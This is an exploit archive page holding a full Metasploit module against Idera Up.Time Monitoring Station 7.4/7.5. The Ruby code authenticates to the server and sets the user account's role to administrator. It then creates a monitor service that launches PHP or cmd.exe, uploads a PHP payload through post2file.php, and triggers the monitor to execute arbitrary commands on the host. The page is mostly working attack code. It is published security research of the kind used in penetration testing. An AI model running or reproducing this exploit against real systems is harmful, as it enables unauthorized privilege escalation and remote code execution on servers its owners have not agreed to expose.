what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload Version 2

Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload Version 2
Posted Nov 13, 2015
Authored by Denis Andzakovic | Site metasploit.com

This Metasploit module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php, which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands.

tags | exploit, web, arbitrary, php, file upload
SHA-256 | e4c4f677632b91ee1052cfd06295ff58c8b4598033272f0dde8231ba8fb27720

Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload Version 2

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit4 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.

The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
by the vendor.

Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
can still be bypassed and gain privilege escalation, and allows the attacker to upload file
again, and execute arbitrary commands.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
],
'References' =>
[
['EDB', '37888'],
['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => 'true',
'DefaultTarget' => 0,
# The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
# it was discovered again by Ewerson 'Crash' Guimaraes.
'DisclosureDate' => 'Nov 18 2013'
))

register_options(
[
Opt::RPORT(9999),
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
], self.class)

register_advanced_options(
[
OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
], self.class)
end

def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end

def print_error(msg='')
super("#{rhost}:#{rport} - #{msg}")
end

def print_good(msg='')
super("#{rhost}:#{rport} - #{msg}")
end

# Application Check
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
vprint_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end

n = Nokogiri::HTML(res.body)
uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')

if uptime_text
version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
vprint_status("Found version: #{version}")
if version >= '7.4.0' && version <= '7.5.0'
return Exploit::CheckCode::Appears
end
end

Exploit::CheckCode::Safe
end

def create_exec_service(*args)
cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
res_service = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'section' => 'ERDCInstance',
'subsection' => 'add',
},
'vars_post' => {
'initialERDCId' => '20',
'target' => '1',
'targetType' => 'systemList',
'systemList' => '1',
'serviceGroupList' => '-10',
'initialMode' => 'standard',
'erdcName' => 'Exploit',
'erdcInitialName' => '',
'erdcDescription' => 'Exploit',
'hostButton' => 'system',
'erdc_id' => '20',
'forceReload' => '0',
'operation' => 'standard',
'erdc_instance_id' => '',
'label_[184]' => 'Script Name',
'value_[184]' => cmd,
'id_[184]' => 'process',
'name_[process]' => '184',
'units_[184]' => '',
'guiBasic_[184]' => '1',
'inputType_[184]' => 'GUIString',
'screenOrder_[184]' => '1',
'parmType_[184]' => '1',
'label_[185]' => 'Arguments',
'value_[185]' => cmdargs,
'id_[185]' => 'args',
'name_[args]' => '185',
'units_[185]' => '',
'guiBasic_[185]' => '1',
'inputType_[185]' => 'GUIString',
'screenOrder_[185]' => '2',
'parmType_[185]' => '1',
'label_[187]' => 'Output',
'can_retain_[187]' => 'false',
'comparisonWarn_[187]' => '-1',
'comparison_[187]' => '-1',
'id_[187]' => 'value_critical_output',
'name_[output]' => '187',
'units_[187]' => '',
'guiBasic_[187]' => '1',
'inputType_[187]' => 'GUIString',
'screenOrder_[187]' => '4',
'parmType_[187]' => '2',
'label_[189]' => 'Response time',
'can_retain_[189]' => 'false',
'comparisonWarn_[189]' => '-1',
'comparison_[189]' => '-1',
'id_[189]' => 'value_critical_timer',
'name_[timer]' => '189',
'units_[189]' => 'ms',
'guiBasic_[189]' => '0',
'inputType_[189]' => 'GUIInteger',
'screenOrder_[189]' => '6',
'parmType_[189]' => '2',
'timing_[erdc_instance_monitored]' => '1',
'timing_[timeout]' => '60',
'timing_[check_interval]' => '10',
'timing_[recheck_interval]' => '1',
'timing_[max_rechecks]' => '3',
'alerting_[notification]' => '1',
'alerting_[alert_interval]' => '120',
'alerting_[alert_on_critical]' => '1',
'alerting_[alert_on_warning]' => '1',
'alerting_[alert_on_recovery]' => '1',
'alerting_[alert_on_unknown]' => '1',
'time_period_id' => '1',
'pageFinish' => 'Finish',
'pageContinue' => 'Continue...',
'isWizard' => '1',
'wizardPage' => '2',
'wizardNumPages' => '2',
'wizardTask' => 'pageFinish',
'visitedPage[1]' => '1',
'visitedPage[2]' => '1'
})
end

def exploit
vprint_status('Trying to login...')
# Application Login
res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while trying to login')
end

# Check OS
phpfile_name = rand_text_alpha(10)
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Found Linux installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')

cmdargs = "#{uploadpath}#{phpfile_name}.txt"
cmd = phppath
else
vprint_status('Found Windows installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
cmd = datastore['CmdPath']
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
end

if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Login success')

# Privilege escalation getting user ID
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'page' => 'Users',
'subPage' => 'UserContainer'
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)

unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
end

matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)

unless matchdata
fail_with(Failure::Unknown, 'Unable to find userID for escalation')
end

get_id = matchdata[0].gsub(/[^\d]/, '')
vprint_status('Escalating privileges...')

# Privilege escalation post
res_priv_elev = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'section' => 'UserContainer',
'subsection' => 'edit',
'id' => "#{get_id}"
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'operation' => 'submit',
'disableEditOfUsernameRoleGroup' => 'false',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'passwordConfirm' => datastore['PASSWORD'],
'firstname' => rand_text_alpha(10),
'lastname' => rand_text_alpha(10),
'location' => '',
'emailaddress' => '',
'emailtimeperiodid' => '1',
'phonenumber' => '',
'phonenumbertimeperiodid' => '1',
'windowshost' => '',
'windowsworkgroup' => '',
'windowspopuptimeperiodid' => '1',
'landingpage' => 'MyPortal',
'isonvacation' => '0',
'receivealerts' => '0',
'activexgraphs' => '0',
'newuser' => 'on',
'newuser' => '1',
'userroleid' => '1',
'usergroupid[]' => '1'
}
)

unless res_priv_elev
fail_with(Failure::Unknown, 'Connection timed out while escalating...')
end

# Refresing perms
vprint_status('Refreshing perms...')
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)

unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
end

res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
end

if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Priv. Escalation success')
end

# CREATING Linux EXEC Service
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Creating Linux Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)

else
# CREATING Windows EXEC Service#
vprint_status('Creating Windows Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
end

# Upload file
vprint_status('Uploading file...')
up_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
'vars_post' => {
'file_name' => "#{phpfile_name}.txt",
'script' => payload.encoded
}
)

unless up_res
fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
end

vprint_status('Checking Uploaded file...')
res_up_check = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
)

if res_up_check && res_up_check.code == 200
print_good("File found: #{phpfile_name}")
else
print_error('File not found')
return
end

# Get Monitor ID

vprint_status('Fetching Monitor ID...')
res_mon_id = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
'iDisplayStart' => '0',
'iDisplayLength' => '10',
'sSearch' => 'Exploit'
}
)

unless res_mon_id
fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
end

matchdata = res_mon_id.body.match(/id=?[^>]*>/)

unless matchdata
fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
end

mon_get_id = matchdata[0].gsub(/[^\d]/, '')
print_good("Monitor id aquired:#{mon_get_id}")
# Executing monitor
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'section' => 'RunERDCInstance',
'subsection' => 'view',
'id' => mon_get_id,
'name' => 'Exploit'
}
)
else
print_error('Cookie not found')
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close